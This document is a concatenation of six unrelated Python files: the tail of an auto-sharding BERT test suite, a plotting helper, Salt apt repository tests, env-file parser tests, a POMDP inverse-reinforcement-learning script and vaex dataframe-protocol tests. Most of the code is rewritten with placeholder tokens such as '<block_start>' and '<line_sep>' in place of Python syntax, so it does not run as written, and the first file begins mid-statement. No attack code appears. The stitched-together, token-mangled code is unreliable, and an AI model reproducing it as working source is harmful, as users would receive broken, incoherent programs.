self<block_start>self.as_option.force_zero_stage_3=<true><line_sep>self.as_option.force_zero_stage_3_all_gather_threshold=1<line_sep>self.test_bert_mlm_data_parallel()<block_end>@unittest.skip("This test is broken after we disallow some replicated iota.")<def_stmt>test_bert_mlm_model_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_mlm_model_parallel()<block_end><def_stmt>test_bert_mlm_2d_mesh_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_mlm_2d_mesh()<block_end><def_stmt>test_bert_layer_model_parallel_remat self<block_start>batch_size=8<line_sep>seq_len=8<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<true><line_sep># Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>expected=(num_layers<times>6-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<assert_stmt>n_total<eq>num_layers<times>6-1<assert_stmt>n_all_reduce<eq>num_layers<times>6-1<assert_stmt>n_total<eq>n_all_reduce<block_end><block_end><block_end><def_stmt>suite <block_start>suite=unittest.TestSuite()<def_stmt>add name<block_start>suite.addTest(AutoShardingAttentionTest(name))<block_end>add("test_bert_layer_data_parallel")<line_sep>add("test_bert_layer_model_parallel")<line_sep>add("test_bert_layer_2d_mesh")<line_sep>add("test_bert_layer_force_batch_dim_mapping")<line_sep>add("test_embedding_2d_mesh")<line_sep>add("test_bert_mlm_data_parallel")<line_sep>add("test_bert_mlm_model_parallel")<line_sep>add("test_bert_mlm_2d_mesh")<line_sep>add("test_bert_layer_data_parallel_reduce_scatter")<line_sep>add("test_bert_layer_model_parallel_reduce_scatter")<line_sep>add("test_bert_layer_2d_mesh_reduce_scatter")<line_sep>add("test_bert_mlm_data_parallel_reduce_scatter")<line_sep>add("test_bert_mlm_model_parallel_reduce_scatter")<line_sep>add("test_bert_mlm_2d_mesh_reduce_scatter")<line_sep>add("test_bert_mlm_data_parallel_reduce_scatter_zero_3")<line_sep>add("test_bert_layer_model_parallel_remat")<line_sep><return>suite<block_end><if_stmt>__name__<eq>"__main__"<block_start>runner=unittest.TextTestRunner()<line_sep>runner.run(suite())<block_end> |
"""
This module provides plotting support in iPython.
"""<import_from_stmt>functools wraps<import_stmt>matplotlib.pyplot<as>plt<line_sep>__all__=['peek_show' "axis_labels_from_ctype"]<def_stmt>peek_show func<block_start>"""
A decorator to place on ``peek()`` methods to show the figure.
The ``peek()`` method should return the figure then this method will
attempt to show it in the correct way. This decorator will not return the
figure to the user.
"""<line_sep>@wraps(func)<def_stmt>show_figure *args **kwargs<block_start>_=func(*args **kwargs)<line_sep>plt.show()<block_end><return>show_figure<block_end><def_stmt>axis_labels_from_ctype ctype unit<block_start>"""
Returns axis labels for the given coordinate type and unit.
Parameters
----------
ctype: `str`
Coordinate type.
unit: `str`, `None`
Required unit. If `None` no unit is added to the label.
Returns
-------
`str`
"Axis Label [Unit]"
"""<line_sep>ctype_short=ctype[:4]<line_sep>labels={'HGLN':f'Heliographic Longitude' 'CRLN':f'Carrington Longitude' 'HPLN':f'Helioprojective Longitude (Solar-X)' 'SOLX':f'Heliocentric X' 'HGLT':f'Latitude' 'CRLT':f'Latitude' 'HPLT':f'Helioprojective Latitude (Solar-Y)' 'SOLY':f'Heliocentric Y'}<line_sep>label=labels.get(ctype_short f"{ctype}")<if_stmt>unit<is><not><none><block_start>label<augadd>f' [{unit}]'<block_end><return>label<block_end> |
<import_stmt>pathlib<import_stmt>shutil<import_stmt>pytest<import_stmt>salt.exceptions<import_stmt>salt.modules.aptpkg<as>aptpkg<import_stmt>salt.modules.cmdmod<as>cmd<import_stmt>salt.modules.file<as>file<import_stmt>salt.utils.files<import_stmt>salt.utils.stringutils<import_from_stmt>tests.support.mock Mock patch<line_sep>pytestmark=[pytest.mark.skip_if_binaries_missing("apt-cache" "grep") ]<line_sep>@pytest.fixture<def_stmt>configure_loader_modules minion_opts<block_start><return>{aptpkg:{"__salt__":{"cmd.run_all":cmd.run_all "cmd.run":cmd.run "file.replace":file.replace "file.append":file.append "file.grep":file.grep } "__opts__":minion_opts } file:{"__salt__":{"cmd.run_all":cmd.run_all} "__utils__":{"files.is_text":salt.utils.files.is_text "stringutils.get_diff":salt.utils.stringutils.get_diff } "__opts__":minion_opts } }<block_end>@pytest.fixture()<def_stmt>revert_repo_file tmp_path<block_start><try_stmt><block_start>repo_file=pathlib.Path("/etc")/"apt"/"sources.list"<line_sep>backup=tmp_path/"repo_backup"<line_sep># make copy of repo file
shutil.copy(str(repo_file) str(backup))<line_sep><yield><block_end><finally_stmt># revert repo file
<block_start>shutil.copy(str(backup) str(repo_file))<line_sep>aptpkg.refresh_db()<block_end><block_end><def_stmt>get_current_repo multiple_comps=<false><block_start>"""
Get a repo currently in sources.list
multiple_comps:
Search for a repo that contains multiple comps.
For example: main, restricted
"""<with_stmt>salt.utils.files.fopen("/etc/apt/sources.list")<as>fp<block_start><for_stmt>line fp<block_start><if_stmt>line.startswith("#")<block_start><continue><block_end><if_stmt>"ubuntu.com"<in>line<or>"debian.org"<in>line<block_start>test_repo=line.strip()<line_sep>comps=test_repo.split()[3:]<if_stmt>multiple_comps<block_start><if_stmt>len(comps)<g>1<block_start><break><block_end><block_end><else_stmt><block_start><break><block_end><block_end><block_end><block_end><return>test_repo comps<block_end><def_stmt>test_list_repos <block_start>"""
Test aptpkg.list_repos
"""<line_sep>ret=aptpkg.list_repos()<line_sep>repos=[x<for>x ret<if>"http"<in>x]<for_stmt>repo repos<block_start>check_repo=ret[repo][0]<for_stmt>key ["comps" "dist" "uri" "line" "architectures" "file" "type" ]<block_start><assert_stmt>key<in>check_repo<block_end><assert_stmt>pathlib.Path(check_repo["file"]).is_file()<assert_stmt>check_repo["dist"]<in>check_repo["line"]<if_stmt>isinstance(check_repo["comps"] list)<block_start><assert_stmt>" ".join(check_repo["comps"])<in>check_repo["line"]<block_end><else_stmt><block_start><assert_stmt>check_repo["comps"]<in>check_repo["line"]<block_end><block_end><block_end><def_stmt>test_get_repos <block_start>"""
Test aptpkg.get_repos
"""<line_sep>test_repo,comps=get_current_repo()<if_stmt><not>test_repo<block_start>pytest.skip("Did not detect an apt repo")<block_end>exp_ret=test_repo.split()<line_sep>ret=aptpkg.get_repo(repo=test_repo)<assert_stmt>ret["type"]<eq>exp_ret[0]<assert_stmt>ret["uri"]<eq>exp_ret[1]<assert_stmt>ret["dist"]<eq>exp_ret[2]<assert_stmt>ret["comps"]<eq>exp_ret[3:]<assert_stmt>ret["file"]<eq>"/etc/apt/sources.list"<block_end><def_stmt>test_get_repos_multiple_comps <block_start>"""
Test aptpkg.get_repos when multiple comps
exist in repo.
"""<line_sep>test_repo,comps=get_current_repo(multiple_comps=<true>)<if_stmt><not>test_repo<block_start>pytest.skip("Did not detect an ubuntu repo")<block_end>exp_ret=test_repo.split()<line_sep>ret=aptpkg.get_repo(repo=test_repo)<assert_stmt>ret["type"]<eq>exp_ret[0]<assert_stmt>ret["uri"]<eq>exp_ret[1]<assert_stmt>ret["dist"]<eq>exp_ret[2]<assert_stmt>ret["comps"]<eq>exp_ret[3:]<block_end><def_stmt>test_get_repos_doesnot_exist <block_start>"""
Test aptpkg.get_repos when passing a repo
that does not exist
"""<for_stmt>test_repo ["doesnotexist" "deb http://archive.ubuntu.com/ubuntu/ focal-backports compdoesnotexist" ]<block_start>ret=aptpkg.get_repo(repo=test_repo)<assert_stmt><not>ret<block_end><block_end>@pytest.mark.destructive_test<def_stmt>test_del_repo revert_repo_file<block_start>"""
Test aptpkg.del_repo when passing repo
that exists. And checking correct error
is returned when it no longer exists.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>ret=aptpkg.del_repo(repo=test_repo)<assert_stmt>"Repo '{}' has been removed".format(test_repo)<with_stmt>pytest.raises(salt.exceptions.CommandExecutionError)<as>exc<block_start>ret=aptpkg.del_repo(repo=test_repo)<block_end><assert_stmt>"Repo {} doesn't exist".format(test_repo)<in>exc.value.message<block_end><def_stmt>test_expand_repo_def <block_start>"""
Test aptpkg.expand_repo_def when the repo exists.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>ret=aptpkg.expand_repo_def(repo=test_repo)<for_stmt>key ["comps" "dist" "uri" "line" "architectures" "file" "type" ]<block_start><assert_stmt>key<in>ret<assert_stmt>pathlib.Path(ret["file"]).is_file()<assert_stmt>ret["dist"]<in>ret["line"]<if_stmt>isinstance(ret["comps"] list)<block_start><for_stmt>comp ret["comps"]<block_start><assert_stmt>comp<in>ret["line"]<block_end><block_end><else_stmt><block_start><assert_stmt>ret["comps"]<in>ret["line"]<block_end><block_end><block_end>@pytest.mark.destructive_test<def_stmt>test_mod_repo revert_repo_file<block_start>"""
Test aptpkg.mod_repo when the repo exists.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>msg="This is a test"<with_stmt>patch.dict(aptpkg.__salt__ {"config.option":Mock()})<block_start>ret=aptpkg.mod_repo(repo=test_repo comments=msg)<block_end><assert_stmt>sorted(ret[list(ret.keys())[0]]["comps"])<eq>sorted(comps)<line_sep>ret=file.grep("/etc/apt/sources.list" msg)<assert_stmt>"#{}".format(msg)<in>ret["stdout"]<block_end>@pytest.mark.destructive_test<def_stmt>test_mod_repo_no_file tmp_path revert_repo_file<block_start>"""
Test aptpkg.mod_repo when the file does not exist.
It should create the file.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>test_file=str(tmp_path/"test_repo")<with_stmt>patch.dict(aptpkg.__salt__ {"config.option":Mock()})<block_start>ret=aptpkg.mod_repo(repo=test_repo file=test_file)<block_end><with_stmt>salt.utils.files.fopen(test_file "r")<as>fp<block_start>ret=fp.read()<block_end><assert_stmt>test_repo.split()[1]<in>ret.strip()<for_stmt>comp comps<block_start><assert_stmt>comp<in>ret<block_end><block_end> |
from poethepoet.envfile import parse_env_file

import pytest

# Each entry pairs raw env-file text with the mapping it must parse to.
valid_examples = [
    (
        """
# empty
""",
        {},
    ),
    (
        """
# single word values
WORD=something
WORD_WITH_HASH=some#thing
NUMBER=0
EMOJI=😃😃
DOUBLE_QUOTED_WORD="something"
SINGLE_QUOTED_WORD='something'
""",
        {
            "WORD": "something",
            "WORD_WITH_HASH": "some#thing",
            "NUMBER": "0",
            "EMOJI": "😃😃",
            "DOUBLE_QUOTED_WORD": "something",
            "SINGLE_QUOTED_WORD": "something",
        },
    ),
    (
        """
# multiword values
WORD=some\\ thing # and trailing comments
DOUBLE_QUOTED_WORD="some thing"
SINGLE_QUOTED_WORD='some thing'
""",
        {
            "WORD": r"some thing",
            "DOUBLE_QUOTED_WORD": "some thing",
            "SINGLE_QUOTED_WORD": "some thing",
        },
    ),
    (
        """
# values with line breaks
WORD=some\\
thing
DOUBLE_QUOTED_WORD="some
 thing"
SINGLE_QUOTED_WORD='some
 thing'
""",
        {
            "WORD": "some\nthing",
            "DOUBLE_QUOTED_WORD": "some\n thing",
            "SINGLE_QUOTED_WORD": "some\n thing",
        },
    ),
    (
        """
# without linebreak between vars
FOO=BAR BAR=FOO
""",
        {"FOO": "BAR", "BAR": "FOO"},
    ),
    (
        """
# with semicolons
; FOO=BAR;BAR=FOO ;
;
BAZ="2;'2"#;
\tQUX=3\t;
""",
        {"FOO": "BAR", "BAR": "FOO", "BAZ": "2;'2#", "QUX": "3"},
    ),
    (
        r"""
# with extra backslashes
FOO=a\\\ b
BAR='a\\\ b'
BAZ="a\\\ b"
""",
        {"FOO": r"a\ b", "BAR": r"a\\\ b", "BAZ": r"a\ b"},
    ),
    (
        # a value with many parts and some empty vars
        r"""FOO=a\\\ b'a\\\ b'"a\\\ b"#"#"'\'' ;'#;\t
BAR=
BAZ= # still empty
QUX=""",
        {"FOO": r"a\ ba\\\ ba\ b##\ ;#", "BAR": "", "BAZ": "", "QUX": ""},
    ),
    # export keyword is allowed
    (
        """export answer=42
export \t question=undefined
export\tdinner=chicken
""",
        {"answer": "42", "question": "undefined", "dinner": "chicken"},
    ),
]

# Inputs that parse_env_file must reject with a ValueError.
invalid_examples = [
    "foo = bar",
    "foo =bar",
    "foo= bar",
    "foo\t=\tbar",
    "foo\t=bar",
    "foo=\tbar",
    "foo= 'bar",
    'foo= "bar"',
    "foo",
    "foo;",
    "8oo=bar",
    "foo@=bar",
    '"foo@"=bar',
    "'foo@'=bar",
    r"foo\=bar",
    r"foo\==bar",
    r"export;foo=bar",
    r"export\nfoo=bar",
]


@pytest.mark.parametrize("content, expected", valid_examples)
def test_parse_valid_env_files(content, expected):
    # Each well-formed env file must parse to exactly the expected mapping.
    assert parse_env_file(content) == expected


@pytest.mark.parametrize("example", invalid_examples)
def test_parse_invalid_env_files(example):
    # Malformed input must be rejected, never silently mis-parsed.
    with pytest.raises(ValueError):
        parse_env_file(example)
"""
Package for DjangoWebProject1.
"""<line_sep> |
"""Off-policy POMDP inverse reinforcement learning via Metropolis-Hastings.

Each iteration proposes either new POMDP dynamics (b0, T, O) -- by imputing
latent state trajectories with a forward/backward pass and resampling from
the resulting Dirichlet posterior -- or a random-walk perturbation of the
reward matrix R, and accepts the proposal with the usual Metropolis
criterion on the soft-max-policy trajectory log-likelihood.
"""
import argparse

import dill
import jax
import numpy as np

import pomdp

pomdp.horizon = 25

parser = argparse.ArgumentParser()
parser.add_argument('--silent', action='store_true')
parser.add_argument('--cont', action='store_true')
parser.add_argument('--bias', action='store_true')
args = parser.parse_args()

key = jax.random.PRNGKey(0)

suffix = '-bias' if args.bias else ''
# The result file doubles as the checkpoint that --cont resumes from.
result_path = 'res/res{}-offpoirl.obj'.format(suffix)

with open('data/data{}-meta.obj'.format(suffix), 'rb') as f:
    data_meta = dill.load(f)
    S = data_meta['S']
    A = data_meta['A']
    Z = data_meta['Z']

with open('data/data{}.obj'.format(suffix), 'rb') as f:
    data = dill.load(f)


def log_pi(alp, bet, b):
    """Log soft-max policy over actions for belief ``b``.

    ``alp[a]`` is the matrix of alpha-vectors for action ``a`` (from
    ``pomdp.solve``); ``bet`` is the inverse-temperature of the soft-max.
    Returns the vector of log action probabilities.
    """
    res = np.zeros(A)
    for a in range(A):
        if alp[a].size == 0:
            # No alpha-vector for this action: effectively zero probability.
            res[a] = -1e6
        else:
            res[a] = bet * (alp[a] @ b).max()
    return res - np.log(np.sum(np.exp(res)))


def likelihood(b0, T, O, alp):
    """Total log-likelihood of all trajectories in ``data`` under the
    soft-max policy induced by the alpha-vectors ``alp``."""
    res = 0
    for traj in data:
        b = b0
        for a, z in zip(traj['a'], traj['z']):
            res += log_pi(alp, 10, b)[a]
            # Bayesian belief update with action a and observation z.
            b = O[a, :, z] * (T[:, a, :].T @ b)
            b /= b.sum()
    return res


if args.cont:
    # BUG FIX: this branch previously read ``args.output``, which is never
    # defined by the parser and crashed with AttributeError. Resume from the
    # checkpoint file that the loop below writes.
    with open(result_path, 'rb') as f:
        res = dill.load(f)
        key = res['key']
        b0, T, O, R = res['out'][-1]
else:
    res = dict()
    res['out'] = list()

    key, *subkey = jax.random.split(key, 4)
    b0 = np.array(jax.random.dirichlet(subkey[0], np.ones(S)))
    T = np.array(jax.random.dirichlet(subkey[1], np.ones((S, A, S)), shape=(S, A)))
    # BUG FIX: O previously reused subkey[1] (the same key as T), producing
    # correlated draws; subkey[2] was generated for this purpose and unused.
    O = np.array(jax.random.dirichlet(subkey[2], np.ones((A, S, Z)), shape=(A, S)))
    # Pin the known parts of the dynamics to fixed values
    # (hard-coded arrays assume S=2, A=3, Z=2 -- confirm against data-meta).
    T = np.array([[[1, 0], [1, 0], [1, 0]], [[0, 1], [0, 1], [0, 1]]])
    O[:2, ...] = np.array([[[1, 0], [1, 0]], [[0, 1], [0, 1]]])
    key, subkey = jax.random.split(key)
    R = np.array([[1, -1.5, 0], [-1.5, 1, 0]]) * .25
    R += .001 * np.array(jax.random.normal(subkey, shape=(S, A)))

alp = pomdp.solve(S, A, Z, b0, T, O, R)
like = likelihood(b0, T, O, alp)

rtio = 0    # number of accepted proposals
rtio_n = 0  # total number of proposals
for i in range(len(res['out']), 1000):
    _b0, _T, _O, _R = b0, T, O, R

    key, subkey = jax.random.split(key)
    if jax.random.choice(subkey, [True, False]):
        # --- Proposal 1: resample the dynamics (b0, T, O) -------------------
        for traj in data:
            # Forward (filtering) pass.
            alp = [None] * (traj['tau'] + 1)
            alp[0] = b0
            for t in range(traj['tau']):
                alp[t + 1] = O[traj['a'][t], :, traj['z'][t]] * (T[:, traj['a'][t], :].T @ alp[t])
                alp[t + 1] /= alp[t + 1].sum()
            # Backward pass.
            bet = [None] * (traj['tau'] + 1)
            bet[-1] = np.ones(S)
            for t in reversed(range(traj['tau'])):
                bet[t] = T[:, traj['a'][t], :] @ (O[traj['a'][t], :, traj['z'][t]] * bet[t + 1])
                bet[t] /= bet[t].sum()
            # Smoothed posteriors, then sample a latent state trajectory.
            gmm = [None] * (traj['tau'] + 1)
            for t in range(traj['tau'] + 1):
                gmm[t] = alp[t] * bet[t]
                gmm[t] /= gmm[t].sum()
            traj['s'] = [None] * (traj['tau'] + 1)
            for t in range(traj['tau'] + 1):
                key, subkey = jax.random.split(key)
                traj['s'][t] = jax.random.choice(subkey, range(S), p=gmm[t])

        # Dirichlet posterior counts (all-ones prior).
        dir_b0 = np.ones(b0.shape)
        dir_T = np.ones(T.shape)
        dir_O = np.ones(O.shape)
        for traj in data:
            dir_b0[traj['s'][0]] += 1
            for t in range(traj['tau']):
                dir_T[traj['s'][t], traj['a'][t], traj['s'][t + 1]] += 1
            for t in range(traj['tau']):
                dir_O[traj['a'][t], traj['s'][t + 1], traj['z'][t]] += 1

        key, subkey = jax.random.split(key)
        _b0 = np.array(jax.random.dirichlet(subkey, dir_b0))
        if args.bias:
            _b0 = np.array([.5, .5])
        # T and the first two observation rows are known; only O[2] is
        # resampled from its posterior.
        _T = np.array([[[1, 0], [1, 0], [1, 0]], [[0, 1], [0, 1], [0, 1]]])
        _O = np.array([[[1, 0], [1, 0]], [[0, 1], [0, 1]], [[.5, .5], [.5, .5]]])
        for s in range(S):
            key, subkey = jax.random.split(key)
            _O[2, s, :] = np.array(jax.random.dirichlet(subkey, dir_O[2, s, :]))
    else:
        # --- Proposal 2: random-walk perturbation of the reward matrix ------
        key, subkey = jax.random.split(key)
        _R = R + .001 * np.array(jax.random.normal(subkey, shape=(S, A)))

    _alp = pomdp.solve(S, A, Z, _b0, _T, _O, _R)
    _like = likelihood(_b0, _T, _O, _alp)

    # Metropolis acceptance step.
    key, subkey = jax.random.split(key)
    unif = jax.random.uniform(subkey)
    if np.log(unif) < _like - like:
        b0, T, O, R = _b0, _T, _O, _R
        like = _like
    rtio += 1 if like == _like else 0
    rtio_n += 1
    if not args.silent:
        print('i = {}, like = {}, {} ({})'.format(i, like, '*' if like == _like else '-', rtio / rtio_n))

    res['key'] = key
    res['out'].append((b0, T, O, R))
    if (i + 1) % 100 == 0:  # periodic checkpoint
        with open(result_path, 'wb') as f:
            dill.dump(res, f)

with open(result_path, 'wb') as f:
    dill.dump(res, f)
import numpy as np
import pyarrow as pa
import pytest
from typing import Any, Optional, Tuple, Dict, Iterable, Sequence

# Duck-typed interchange-protocol objects.
DataFrameObject = Any
ColumnObject = Any

import vaex
from common import *
from vaex.dataframe_protocol import _from_dataframe_to_vaex, _DtypeKind, _VaexBuffer, _VaexColumn, _VaexDataFrame


def test_float_only(df_factory):
    # Round-trip a float-only frame through the interchange protocol.
    df = df_factory(x=[1.5, 2.5, 3.5], y=[9.2, 10.5, 11.8])
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    dfo2 = df2.__dataframe__()
    assert df2.x.tolist() == df.x.tolist()
    assert df2.y.tolist() == df.y.tolist()
    assert dfo2.get_column_by_name("x").null_count == 0
    assert dfo2.get_column_by_name("y").null_count == 0
    assert_dataframe_equal(df.__dataframe__(), df)


def test_mixed_intfloat(df_factory):
    df = df_factory(x=[1, 2, 0], y=[9.2, 10.5, 11.8])
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    dfo2 = df2.__dataframe__()
    assert df2.x.tolist() == df.x.tolist()
    assert df2.y.tolist() == df.y.tolist()
    assert dfo2.get_column_by_name("x").null_count == 0
    assert dfo2.get_column_by_name("y").null_count == 0
    assert_dataframe_equal(df.__dataframe__(), df)


def test_mixed_intfloatbool(df_factory):
    df = df_factory(x=np.array([True, True, False]),
                    y=np.array([1, 2, 0]),
                    z=np.array([9.2, 10.5, 11.8]))
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    dfo2 = df2.__dataframe__()
    assert df2.x.tolist() == df.x.tolist()
    assert df2.y.tolist() == df.y.tolist()
    assert df2.z.tolist() == df.z.tolist()
    assert dfo2.get_column_by_name("x").null_count == 0
    assert dfo2.get_column_by_name("y").null_count == 0
    assert dfo2.get_column_by_name("z").null_count == 0

    # Additional checks of the _VaexColumn wrapper itself.
    col_x = dfo2.get_column_by_name("x")
    assert col_x._allow_copy == True
    assert col_x.size == 3
    assert col_x.offset == 0

    col_z = dfo2.get_column_by_name("z")
    assert col_z.dtype[0] == 2  # 2: float64
    assert col_z.dtype[1] == 64  # 64: float64
    assert col_z.dtype == (2, 64, "<f8", "=")

    with pytest.raises(TypeError):
        assert dfo2.get_column_by_name("y").describe_categorical
    if df2['y'].dtype.is_arrow:
        assert dfo2.get_column_by_name("y").describe_null == (3, 0)
    else:
        assert dfo2.get_column_by_name("y").describe_null == (0, None)

    assert_dataframe_equal(df.__dataframe__(), df)


def test_mixed_missing(df_factory_arrow):
    df = df_factory_arrow(x=np.array([True, None, False, None, True]),
                          y=np.array([None, 2, 0, 1, 2]),
                          z=np.array([9.2, 10.5, None, 11.8, None]))
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    assert df.__dataframe__().metadata == df2.__dataframe__().metadata

    # Same values, same dtype and the expected null count per column.
    for name, expected_nulls in (("x", 2), ("y", 1), ("z", 2)):
        assert df[name].tolist() == df2[name].tolist()
        assert not df2[name].is_masked
        assert df2.__dataframe__().get_column_by_name(name).null_count == expected_nulls
        assert df[name].dtype == df2[name].dtype

    assert_dataframe_equal(df.__dataframe__(), df)


def test_missing_from_masked(df_factory_numpy):
    df = df_factory_numpy(
        x=np.ma.array([1, 2, 3, 4, 0], mask=[0, 0, 0, 1, 1], dtype=int),
        y=np.ma.array([1.5, 2.5, 3.5, 4.5, 0], mask=[False, True, True, True, False], dtype=float),
        z=np.ma.array([True, False, True, True, True], mask=[1, 0, 0, 1, 0], dtype=bool),
    )
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    assert df.__dataframe__().metadata == df2.__dataframe__().metadata

    # Masked entries must come back as nulls, not as a numpy mask.
    for name, expected_nulls in (("x", 2), ("y", 3), ("z", 2)):
        assert df[name].tolist() == df2[name].tolist()
        assert not df2[name].is_masked
        assert df2.__dataframe__().get_column_by_name(name).null_count == expected_nulls
        assert df[name].dtype == df2[name].dtype

    assert_dataframe_equal(df.__dataframe__(), df)


def test_categorical():
    df = vaex.from_arrays(year=[2012, 2013, 2015, 2019], weekday=[0, 1, 4, 6])
    df = df.categorize("year", min_value=2012, max_value=2019)
    df = df.categorize("weekday", labels=["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"])

    # Detailed checks of dtype and null representation.
    col = df.__dataframe__().get_column_by_name("year")
    assert col.dtype[0] == _DtypeKind.CATEGORICAL
    assert col.describe_categorical == (False, True, {0: 2012, 1: 2013, 2: 2014, 3: 2015, 4: 2016, 5: 2017, 6: 2018, 7: 2019})
    assert col.describe_null == (0, None)
    assert col.dtype == (23, 64, "u", "=")

    col2 = df.__dataframe__().get_column_by_name("weekday")
    assert col2.dtype[0] == _DtypeKind.CATEGORICAL
    assert col2.describe_categorical == (False, True, {0: "Mon", 1: "Tue", 2: "Wed", 3: "Thu", 4: "Fri", 5: "Sat", 6: "Sun"})
    assert col2.describe_null == (0, None)
    assert col2.dtype == (23, 64, "u", "=")

    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    assert df2["year"].tolist() == [2012, 2013, 2015, 2019]
    assert df2["weekday"].tolist() == ["Mon", "Tue", "Fri", "Sun"]
    assert_dataframe_equal(df.__dataframe__(), df)


def test_arrow_dictionary():
    indices = pa.array([0, 1, 0, 1, 2, 0, 1, 2])
    dictionary = pa.array(["foo", "bar", "baz"])
    dict_array = pa.DictionaryArray.from_arrays(indices, dictionary)
    df = vaex.from_arrays(x=dict_array)

    # Detailed checks of dtype and null representation.
    col = df.__dataframe__().get_column_by_name("x")
    assert col.dtype[0] == _DtypeKind.CATEGORICAL
    assert col.describe_categorical == (False, True, {0: "foo", 1: "bar", 2: "baz"})
    if df['x'].dtype.is_arrow:
        assert col.describe_null == (3, 0)
    else:
        assert col.describe_null == (0, None)
    assert col.dtype == (23, 64, "u", "=")

    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    assert df2.x.tolist() == df.x.tolist()
    assert df2.__dataframe__().get_column_by_name("x").null_count == 0
    assert_dataframe_equal(df.__dataframe__(), df)


def test_arrow_dictionary_missing():
    indices = pa.array([0, 1, 2, 0, 1], mask=np.array([0, 1, 1, 0, 0], dtype=bool))
    dictionary = pa.array(["aap", "noot", "mies"])
    dict_array = pa.DictionaryArray.from_arrays(indices, dictionary)
    df = vaex.from_arrays(x=dict_array)

    # Detailed checks of dtype and null representation.
    col = df.__dataframe__().get_column_by_name("x")
    assert col.dtype[0] == _DtypeKind.CATEGORICAL
    assert col.describe_categorical == (False, True, {0: "aap", 1: "noot", 2: "mies"})

    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    assert df2.x.tolist() == df.x.tolist()
    assert df2.__dataframe__().get_column_by_name("x").null_count == 2
    assert df["x"].dtype.index_type == df2["x"].dtype.index_type
    assert_dataframe_equal(df.__dataframe__(), df)


def test_string():
    df = vaex.from_dict({"A": ["a", None, "cdef", "", "g"]})
    col = df.__dataframe__().get_column_by_name("A")
    assert col._col.tolist() == df.A.tolist()
    assert col.size == 5
    assert col.null_count == 1
    assert col.dtype[0] == _DtypeKind.STRING
    assert col.describe_null == (3, 0)

    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    col2 = df2.__dataframe__().get_column_by_name("A")
    assert df2.A.tolist() == df.A.tolist()
    assert col2.null_count == 1
    assert col2.describe_null == (3, 0)
    assert col2.dtype[0] == _DtypeKind.STRING

    # Same checks on a sliced frame (non-zero offset into the data).
    df_sliced = df[1:]
    col = df_sliced.__dataframe__().get_column_by_name("A")
    assert col.size == 4
    assert col.null_count == 1
    assert col.dtype[0] == _DtypeKind.STRING
    assert col.describe_null == (3, 0)

    df2 = _from_dataframe_to_vaex(df_sliced.__dataframe__())
    col2 = df2.__dataframe__().get_column_by_name("A")
    assert df2.A.tolist() == df_sliced.A.tolist()
    assert col2.null_count == 1
    assert col2.describe_null == (3, 0)
    assert col2.dtype[0] == _DtypeKind.STRING


def test_no_mem_copy():
    strings = ["a", "", "cdef", "", "g"]
    # Backing buffers for the string array above.
    dbuf = np.array([97, 99, 100, 101, 102, 103], dtype='uint8')
    obuf = np.array([0, 1, 1, 5, 5, 6], dtype='int64')
    length = 5
    buffers = [None, pa.py_buffer(obuf), pa.py_buffer(dbuf)]
    s = pa.Array.from_buffers(pa.large_utf8(), length, buffers)
    x = np.arange(0, 5)
    df = vaex.from_arrays(x=x, s=s)
    df2 = _from_dataframe_to_vaex(df.__dataframe__())

    # Mutating the primitive data must be visible in the converted frame.
    x[0] = 999
    assert df2.x.tolist() == [999, 1, 2, 3, 4]

    # Strings round-trip untouched...
    assert df.s.tolist() == strings
    assert df2.s.tolist() == strings

    # ...and mutating the raw buffer (which neither arrow nor vaex really
    # supports/wants) shows up in both frames, proving no copy was made.
    strings[0] = "b"
    dbuf[0] += 1
    assert df.s.tolist() == strings
    assert df2.s.tolist() == strings


def test_object():
    df = vaex.from_arrays(x=np.array([None, True, False]))
    col = df.__dataframe__().get_column_by_name("x")
    assert col._col.tolist() == df.x.tolist()
    assert col.size == 3
    # Object-dtype columns are not representable in the protocol.
    with pytest.raises(ValueError):
        assert col.dtype
    with pytest.raises(ValueError):
        assert col.describe_null


def test_virtual_column():
    df = vaex.from_arrays(x=np.array([True, True, False]),
                          y=np.array([1, 2, 0]),
                          z=np.array([9.2, 10.5, 11.8]))
    df.add_virtual_column("r", "sqrt(y**2 + z**2)")
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    assert df2.r.tolist() == df.r.tolist()


def test_VaexBuffer():
    x = np.ndarray(shape=(5,), dtype=float, order="F")
    x_buffer = _VaexBuffer(x)
    assert x_buffer.bufsize == 5 * x.itemsize
    assert x_buffer.ptr == x.__array_interface__["data"][0]
    assert x_buffer.__dlpack_device__() == (1, None)
    assert x_buffer.__repr__() == f"VaexBuffer({{'bufsize': {5*x.itemsize}, 'ptr': {x.__array_interface__['data'][0]}, 'device': 'CPU'}})"
    with pytest.raises(NotImplementedError):
        assert x_buffer.__dlpack__()


def test_VaexDataFrame():
    df = vaex.from_arrays(x=np.array([True, True, False]),
                          y=np.array([1, 2, 0]),
                          z=np.array([9.2, 10.5, 11.8]))
    df2 = df.__dataframe__()
    assert df2._allow_copy == True
    assert df2.num_columns() == 3
    assert df2.num_rows() == 3
    assert df2.num_chunks() == 1
    assert df2.column_names() == ["x", "y", "z"]
